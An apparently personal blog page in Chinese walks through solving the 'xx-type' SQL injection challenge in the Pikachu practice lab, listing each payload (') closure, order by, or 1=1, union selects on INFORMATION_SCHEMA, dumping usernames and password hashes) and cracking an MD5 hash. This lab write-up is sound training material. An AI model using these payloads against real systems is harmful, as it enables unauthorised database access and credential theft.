
<!DOCTYPE html>
<html lang="en" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>pikachu解题漏洞报告-SQL-Inject xx型注入 - Hexo</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="Fechin,"> 
    <meta name="description" content="SQL-Inject xx型注入解题过程1.进入靶场，随意输入一个之前有的用户名，例如grady搜索

2.返回了用户id和邮箱

3.以这个输入框为注入点，用order by 进行列数的测试，因为,"> 
    <meta name="author" content="John Doe"> 
    <link rel="alternative" href="atom.xml" title="Hexo" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    
    
    
    <meta name="twitter:card" content="summary"/>
    <meta name="twitter:title" content="pikachu解题漏洞报告-SQL-Inject xx型注入 - Hexo"/>
    <meta name="twitter:description" content="SQL-Inject xx型注入解题过程1.进入靶场，随意输入一个之前有的用户名，例如grady搜索

2.返回了用户id和邮箱

3.以这个输入框为注入点，用order by 进行列数的测试，因为,"/>
    
    
    
    
    <meta property="og:site_name" content="Hexo"/>
    <meta property="og:type" content="object"/>
    <meta property="og:title" content="pikachu解题漏洞报告-SQL-Inject xx型注入 - Hexo"/>
    <meta property="og:description" content="SQL-Inject xx型注入解题过程1.进入靶场，随意输入一个之前有的用户名，例如grady搜索

2.返回了用户id和邮箱

3.以这个输入框为注入点，用order by 进行列数的测试，因为,"/>
    
<link rel="stylesheet" href="/css/diaspora.css">

<meta name="generator" content="Hexo 6.0.0"></head>

<body class="loading">
    <span id="config-title" style="display:none">Hexo</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="iconfont icon-home image-icon" href="javascript:;" data-url="http://example.com"></a>
    <div title="播放/暂停" class="iconfont icon-play"></div>
    <h3 class="subtitle">pikachu解题漏洞报告-SQL-Inject xx型注入</h3>
    <div class="social">
        <div>
            <div class="share">
                <a title="获取二维码" class="iconfont icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title">pikachu解题漏洞报告-SQL-Inject xx型注入</h1>
        <div class="stuff">
            <span>三月 21, 2022</span>
            

        </div>
        <div class="content markdown">
            <h1 id="SQL-Inject-xx型注入"><a href="#SQL-Inject-xx型注入" class="headerlink" title="SQL-Inject xx型注入"></a>SQL-Inject xx型注入</h1><h2 id="解题过程"><a href="#解题过程" class="headerlink" title="解题过程"></a>解题过程</h2><p>1.进入靶场，随意输入一个之前有的用户名，例如grady搜索</p>
<p><img src="https://raw.githubusercontent.com/virbellez/pigo/master/images/20220321121158.png" alt="20220321121158"></p>
<p>2.返回了用户id和邮箱</p>
<p><img src="https://raw.githubusercontent.com/virbellez/pigo/master/images/20220321121321.png" alt="20220321121321"></p>
<p>3.以这个输入框为注入点，用order by 进行列数的测试，因为之前已经返回了两个字段，所以测试从3开始，order by 3的意思是将该表格以第三列的升序来进行排序,使用之前的闭合</p>
<pre><code>grady&#39; order by 3 #&#39;
</code></pre>
<p>4.返回报错，说明用了新的闭合方式</p>
<p><img src="https://raw.githubusercontent.com/virbellez/pigo/master/images/20220321122631.png" alt="20220321122631"></p>
<p>5.猜测使用了括号</p>
<pre><code>grady&#39;) order by 3 #&#39;(
</code></pre>
<p>6.返回结果表示只有两列</p>
<p><img src="https://raw.githubusercontent.com/virbellez/pigo/master/images/20220321140857.png" alt="20220321140857"></p>
<p>7.推测这里的SQL语句是select uid email from 用户表 where username &#x3D; (‘XX’)，于是我们写入语句 or 1&#x3D;1 使得条件永远为真，尝试返回所有用户结果</p>
<p>grady’) or 1&#x3D;1 #’(</p>
<p>8.所有用户都返回了</p>
<p><img src="https://raw.githubusercontent.com/virbellez/pigo/master/images/20220321141519.png" alt="20220321141519"></p>
<p>9.使union查询语句，查询所在数据库名和用户名</p>
<pre><code>grady&#39;) union select database(),user() #&#39;(
</code></pre>
<p>10.根据返回内容获得，数据库名pikachu，用户名root</p>
<p><img src="https://raw.githubusercontent.com/virbellez/pigo/master/images/20220321141918.png" alt="20220321141918"></p>
<p>11.利用查出来的数据库名称pikachu   构建payload为 grady union select TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA &#x3D; ‘pikachu’  来查询pikachu数据库中所有的表名。</p>
<pre><code>grady&#39;) union select TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = &#39;pikachu&#39; #&#39;(
</code></pre>
<p>12.返回查询结果，得到users的表名</p>
<p><img src="https://raw.githubusercontent.com/virbellez/pigo/master/images/20220321142256.png" alt="20220321142256"></p>
<p>13.继续利用之前查出来的数据库名称pikachu、和表名users构建payload 为 x union select TABLE_NAME,COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA &#x3D; ‘pikachu’ and TABLE_NAME &#x3D; ‘users’  查询表中的列名</p>
<pre><code>grady&#39;) union select TABLE_NAME,COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA = &#39;pikachu&#39; and TABLE_NAME = &#39;users&#39; #&#39;(
</code></pre>
<p>14.得到users表中所有的列名，其中有username password的列名</p>
<p><img src="https://raw.githubusercontent.com/virbellez/pigo/master/images/20220321142615.png" alt="20220321142615"></p>
<p>15.继续使用grady union select username,password from users  查询users表中的username和password字段。</p>
<pre><code>grady&#39;) union select username,password from users #&#39;(
</code></pre>
<p>16.查询到username和password的值</p>
<p><img src="https://raw.githubusercontent.com/virbellez/pigo/master/images/20220321143018.png" alt="20220321143018"></p>
<p>17.使用kali的自带工具hash-identifier判断pikachu用户的密码的哈希类型</p>
<pre><code>hash-identifier
</code></pre>
<p><img src="https://raw.githubusercontent.com/virbellez/pigo/master/images/20220317155958.png" alt="20220317155958"></p>
<p>18.填入pikachu的密码670b14728ad9902aecba32e22fa4f6bd</p>
<p><img src="https://raw.githubusercontent.com/virbellez/pigo/master/images/20220317160040.png" alt="20220317160040"></p>
<p>19.得到哈希类型为MD5，打开在线MD5网站<a target="_blank" rel="noopener" href="https://www.cmd5.com/%E8%A7%A3%E5%AF%86">https://www.cmd5.com/解密</a></p>
<p><img src="https://raw.githubusercontent.com/virbellez/pigo/master/images/20220317160159.png" alt="20220317160159"></p>
<p>20.得到密码000000，同理可得到其他用户密码，但是pikachu是root用户，其他的没必要了</p>
<h2 id="知识拓展"><a href="#知识拓展" class="headerlink" title="知识拓展"></a>知识拓展</h2><p>1.这里order by的用法</p>
<p>ORDER BY 是对列的结果进行排序。默认按照升序排序。</p>
<p>这里的order by 3 意思是按照第三列的升序对整个表进行排序</p>
<p>例如  </p>
<pre><code>小明    女      23
小李    男      21
小张    女      30
</code></pre>
<p>使用order by 3 后 表就变成了</p>
<pre><code>小李    男      21
小明    女      23
小张    女      30
</code></pre>
<p>但是本题中因为返回报错了，证明了目标表没有第3列</p>
<p>2.union的用法</p>
<p>union用于合并select查询的结果，UNION 内部的 SELECT 语句必须拥有相同数量的列</p>
<p>例如本解题中用了很多类似grady union select database(),user() 这样的语句，是因为直接使用grady查询，返回的结果是<br>your uid:4<br>your email is: <a href="mailto:&#x67;&#x72;&#97;&#x64;&#121;&#64;&#112;&#105;&#x6b;&#x61;&#x63;&#x68;&#117;&#x2e;&#99;&#x6f;&#x6d;">&#x67;&#x72;&#97;&#x64;&#121;&#64;&#112;&#105;&#x6b;&#x61;&#x63;&#x68;&#117;&#x2e;&#99;&#x6f;&#x6d;</a><br>有两列，这里的uid email两列刚好对应了database(),user()具有相同数量的列，将两个查询结果合并后，就是我们得到的返回结果了。</p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="true">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title="0" data-url="https://link.jscdn.cn/1drv/aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBb05yS01seWpjbkZnMHNkazB1a3lqNl9kMl82P2U9aDgxYUZQ.wav"></li>
                        
                    
                        
                            <li title="1" data-url="https://link.jscdn.cn/1drv/aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBb05yS01seWpjbkZnMHhtbVE0d01TYUZqQ2w4P2U9MGpOaFVZ.wav"></li>
                        
                    
                </ul>
            
        </div>
        
    <div id="gitalk-container" class="comment link"
		data-enable="false"
        data-ae="false"
        data-ci=""
        data-cs=""
        data-r=""
        data-o=""
        data-a=""
        data-d="false"
    >查看评论</div>


    </div>
    
        <div class="side">
			<ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#SQL-Inject-xx%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="toc-number">1.</span> <span class="toc-text">SQL-Inject xx型注入</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A7%A3%E9%A2%98%E8%BF%87%E7%A8%8B"><span class="toc-number">1.1.</span> <span class="toc-text">解题过程</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9F%A5%E8%AF%86%E6%8B%93%E5%B1%95"><span class="toc-number">1.2.</span> <span class="toc-text">知识拓展</span></a></li></ol></li></ol>	
        </div>
    
</div>


    </div>
</div>
</body>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/typed.js"></script>
<script src="/js/diaspora.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>






</html>
